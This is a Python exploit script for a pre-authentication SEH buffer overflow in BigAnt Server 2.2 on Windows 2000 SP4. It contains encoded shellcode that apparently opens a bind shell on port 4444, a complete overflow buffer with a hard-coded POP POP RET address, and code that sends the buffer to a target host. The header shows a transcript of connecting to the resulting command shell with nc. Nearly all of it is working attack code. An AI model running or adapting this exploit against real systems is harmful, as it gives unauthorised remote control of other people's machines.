# Title : BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
# Published : 2008-04-15
# Author : Matteo Memelli
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys
# Banner. The original emitted one print statement per line; writing the
# joined lines in a single call produces byte-identical output (each line
# followed by "\n") and parses under both Python 2 and 3.
_BANNER_LINES = (
    "[*********************************************************************]",
    "[* *]",
    "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]",
    "[* Discovered and Coded By *]",
    "[* Matteo Memelli *]",
    "[* (ryujin) *]",
    "[* www.be4mind.com - www.gray-world.net *]",
    "[* *]",
    "[*********************************************************************]",
)
sys.stdout.write("\n".join(_BANNER_LINES) + "\n")
# Command line. Both options are mandatory; optparse has no "required"
# flag, so the check is done after parsing.
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
for flags, kind, dest, text in (
    (("-H", "--target_host"), "string", "HOST", "Target Host"),
    (("-P", "--target_port"), "int", "PORT", "Target Port"),
):
    parser.add_option(*flags, type=kind, action="store", dest=dest, help=text)
(options, args) = parser.parse_args()
HOST, PORT = options.HOST, options.PORT
# An option that was not given leaves its dest as None; an empty host or
# port 0 is treated as missing too. Print the usage and stop (exit status 0,
# exactly as before).
if not (HOST and PORT):
    parser.print_help()
    sys.exit()
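# Payload: x86/alpha_mixed-encoded output, 698 bytes ("[*] x86/alpha_mixed
# succeeded, final size 698" is the encoder's own report; the trailing "SEH"
# is presumably the EXITFUNC that was selected).
# EXITFUNC SEH/THREAD/PROCESS were all tried; the server crashes afterwards
# anyway.
# What the decoded payload does is not visible from these bytes. The header
# transcript connects with nc to TCP/4444 after the send, so presumably a
# bind shell on 4444 -- confirm against the original msfpayload command line.
shellcode = (
    "\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
    "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
    "\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
    "\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
    "\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
    "\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
    "\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
    "\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
    "\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
    "\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
    "\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
    "\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
    "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
    "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
    "\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
    "\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
    "\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
    "\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
    "\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
    "\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
    "\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
    "\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
    "\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
    "\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
    "\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
    "\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
    "\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
    "\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
    "\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
    "\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
    "\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
    "\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
    "\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
    "\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
    "\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
    "\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
    "\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
    "\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
    "\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
    "\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
    "\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
    "\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
    "\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)

# Overflow buffer layout (byte offsets from the start of evilbuf):
#   0    NOP sled, 252 bytes
#   252  shellcode, 698 bytes
#   950  next-SEH pointer: "jmp short +6" (EB 06) plus two NOPs of filler;
#        the jump skips the handler address and lands at offset 958
#   954  SEH handler: 0x77F8AEDC = POP POP RET in user32.dll on Windows 2000
#        SP4 English. DLL addresses are build-specific, so this value (and the
#        exploit) only applies to that exact OS / service pack / language;
#        any other build needs its own POP POP RET address.
#   958  8 NOPs
#   966  jmp rel32 E9 82 FC FF FF: displacement 0xFFFFFC82 = -894, taken from
#        the byte after the instruction (971), so it lands at offset 77,
#        inside the NOP sled, which slides into the shellcode
#   971  1225 bytes of 'C' padding
# The handler offset (954 = 252 + 698 + 4) is the "Offset for SEH overwrite
# is 954 Bytes" figure from the header.
NOP = '\x90'
NSEH = '\xeb\x06' + NOP * 2
SEH_HANDLER = '\xDC\xAE\xF8\x77'   # 0x77F8AEDC, little-endian
JMP_BACK = '\xE9\x82\xFC\xFF\xFF'  # jmp -894 back into the NOP sled
evilbuf = (
    NOP * 252
    + shellcode
    + NSEH
    + SEH_HANDLER
    + NOP * 8
    + JMP_BACK
    + 'C' * 1225
)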
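# Delivery. This script is Python 2 (print statements above), where str is a
# byte string, so evilbuf goes on the wire unchanged. The request is
# "GET <buffer>\n\n"; the overflow happens in the server's handling of that
# line before any authentication (AntServer.exe, per the header).
sys.stdout.write('[+] Connecting to host...\n')
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(10)   # a filtered port or dead host otherwise blocks connect() indefinitely
try:
    s.connect((HOST, PORT))
    sys.stdout.write('[+] Overflowing the buffer...\n')
    # sendall() loops until the whole buffer is queued; send() may return
    # after a partial write and truncate the payload without any error.
    s.sendall('GET ' + evilbuf + '\n\n')
finally:
    s.close()   # release the socket even when connect()/sendall() raised
# The shell is not on the target port: the header transcript connects with nc
# to TCP/4444 after this step (presumably the bind-shell port of the payload).
sys.stdout.write('[+] Done! Payload sent to %s:%d - now connect to the bind shell '
                 'on its own port (4444 in the header transcript)\n' % (HOST, PORT))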